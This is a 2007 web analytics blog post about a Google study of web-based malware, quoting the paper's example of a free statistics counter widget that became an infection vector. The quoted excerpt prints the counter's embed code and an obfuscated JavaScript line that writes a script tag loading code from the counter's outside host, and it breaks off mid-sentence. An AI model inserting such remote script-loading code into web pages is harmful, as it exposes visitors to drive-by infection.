WebAnalyticsbook.com now in GERMAN! Click here | Next Tip »?

Google’s malware study includes stat counter provider

Posted by admin on May 15th, 2007 filed in Best Practices

Google released an interesting study (PDF) about web-based malware and of course one shady counter company is mentioned in the paper. I am not sure which company this is (m1.sta.xx  or http://m1.stats4u.yy ) , but always keep in mind to double check the third-party code on a regular basis. Also make sure to join one of the larger counter companies, that are in the market for some time ( e.g. by typing in their URL in webarchive.org).

“Example of a widget that allows a third-party to insert
arbitrary content into a web page. This widget used to keep statistics
of the number of visitors since 2002 until it was turned into a malware
infection vector in 2006:

<!- Begin Stat Basic code ->
<script language=”JavaScript”
</script><script language=”JavaScript”>
statbasic(“ST8BiCCLfUdmAHKtah3InbhtwoWA”, 0);
// ->
</script> <noscript>
<a href=”http://v1.stat.xx/stats?ST8BidmAHKthtwoWA”>
<img src=”http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA”
border=”0″ nosave width=”18″ height=”18″></a></noscript>
<!- End Stat Basic code ->

While examining our historical data, we detected a web
page that started linking to a free statistics counter in June
2002 and was operating fine until sometime in 2006, when
the nature of the counter changed and instead of cataloging
the number of visitors, it started to exploit every user visiting
pages linked to the counter. In this example, the now
malicious JavaScript first records the presence of the following
external systems: Shockwave Flash, Shockwave for
Director, RealPlayer, QuickTime, VivoActive, LiveAudio,
VRML, Dynamic HTML Binding, Windows Media Services.
It then outputs another piece of JavaScript to the main page:
d.write(“<scr”+”ipt language=’JavaScript’

d.write(“<scr”+”ipt language=’JavaScript’
src=’http://m1.stats4u.yy/md.js?country=us&id=”+ id +
“&_t=”+(new Date()).getTime()+”’></scr”+”ipt>”)
This in turn triggers another wave of implicit dow

found by 10e20

Related Posts

- Archives -